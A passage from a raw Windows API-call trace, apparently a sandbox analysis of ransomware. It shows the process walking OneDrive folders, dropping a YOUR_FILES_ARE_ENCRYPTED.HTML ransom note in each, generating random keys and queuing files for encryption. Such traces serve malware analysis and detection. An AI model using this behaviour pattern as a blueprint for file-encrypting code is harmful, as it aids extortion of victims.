lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35cb5a72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35cb5a72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x361ecea1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.941] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35cb5a72, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35cb5a72, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x361ecea1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="..", cAlternateFileName="")) returned 1 [0113.941] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361ecea1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x361ecea1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36f7c3c3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.942] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.942] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.942] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.942] lstrlenW (lpString=".mui") returned 4 [0113.942] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.942] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361ecea1, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x361ecea1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x36f7c3c3, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x162c0, dwReserved0=0x19e010, dwReserved1=0xc4d9e5, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.942] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.942] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.942] GetProcessHeap () returned 0x600000 [0113.942] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.942] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\te\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\te\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0113.946] WriteFile (in: hFile=0x310, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.953] CloseHandle (hObject=0x310) returned 1 [0113.953] GetProcessHeap () returned 0x600000 [0113.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.953] GetProcessHeap () returned 0x600000 [0113.953] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.954] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2da1851d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2da1851d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3089629e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x494c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="Telemetry.dll", cAlternateFileName="TELEME~1.DLL")) returned 1 [0113.955] StrStrIW (lpFirst="Telemetry.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.955] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll") returned 89 [0113.955] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0113.955] lstrlenW (lpString=".dll") returned 4 [0113.955] PathFindExtensionW (pszPath="Telemetry.dll") returned=".dll" [0113.955] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\telemetry.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x310 [0113.956] GetFileSizeEx (in: hFile=0x310, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=300224) returned 1 [0113.956] GetProcessHeap () returned 0x600000 [0113.956] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.959] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="81") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="58") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="EA") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="39") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="19") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B7") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="5B") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="1F") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="34") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="0E") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="19") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="78") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="9D") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="7C") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="30") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="98") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="01") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="12") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="D5") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="7C") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="D4") returned 2 [0113.959] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="B6") returned 2 [0113.959] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="4D") returned 2 [0113.959] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="E0") returned 2 [0113.959] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="79") returned 2 [0113.959] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="BB") returned 2 [0113.959] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E1") returned 2 [0113.959] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="C1") returned 2 [0113.959] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="64") returned 2 [0113.959] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="48") returned 2 [0113.959] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="8A") returned 2 [0113.959] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="13") returned 2 [0113.960] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\Telemetry.dll" [0113.960] CreateIoCompletionPort (FileHandle=0x310, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.960] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.960] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3773e511, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3773e511, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3773e511, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tg", cAlternateFileName="")) returned 1 [0113.960] StrStrIW (lpFirst="tg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.960] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg") returned 78 [0113.960] GetProcessHeap () returned 0x600000 [0113.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.961] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg" [0113.962] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\*" [0113.962] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3773e511, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3773e511, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x39698686, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.962] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3773e511, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3773e511, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x39698686, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.962] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39698686, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x39698686, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a092ece, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x170c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.962] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.963] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.963] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.963] lstrlenW (lpString=".mui") returned 4 [0113.963] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.963] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39698686, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x39698686, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a092ece, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x170c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.963] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.963] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.963] GetProcessHeap () returned 0x600000 [0113.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tg\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.964] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.965] CloseHandle (hObject=0x334) returned 1 [0113.965] GetProcessHeap () returned 0x600000 [0113.965] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.965] GetProcessHeap () returned 0x600000 [0113.965] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.965] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a187045, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3a187045, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a187045, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="tg-cyrl", cAlternateFileName="")) returned 1 [0113.965] StrStrIW (lpFirst="tg-cyrl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.965] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl") returned 83 [0113.965] GetProcessHeap () returned 0x600000 [0113.965] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.965] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl" [0113.965] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\*" [0113.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a187045, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3a187045, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a4b4493, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.966] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a187045, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3a187045, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3a4b4493, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.967] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a4b4493, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3a4b4493, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3aad5fdc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x170c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.967] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.967] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.967] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.967] lstrlenW (lpString=".mui") returned 4 [0113.967] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.967] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a4b4493, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3a4b4493, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3aad5fdc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x170c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.967] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.967] wnsprintfW (in: pszDest=0x30a0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.967] GetProcessHeap () returned 0x600000 [0113.967] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\tg-cyrl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\tg-cyrl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0113.967] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.968] CloseHandle (hObject=0x334) returned 1 [0113.968] GetProcessHeap () returned 0x600000 [0113.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.969] GetProcessHeap () returned 0x600000 [0113.969] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.969] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad66e62, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ad66e62, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3ad66e62, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="th", cAlternateFileName="")) returned 1 [0113.969] StrStrIW (lpFirst="th", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.969] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th") returned 78 [0113.969] GetProcessHeap () returned 0x600000 [0113.969] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0113.969] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th" [0113.969] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\*" [0113.969] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\th\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad66e62, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ad66e62, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b2a92ce, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0113.969] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ad66e62, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x3ad66e62, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x3b2a92ce, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0113.969] FindNextFileW (in: hFindFile=0x6267b8, 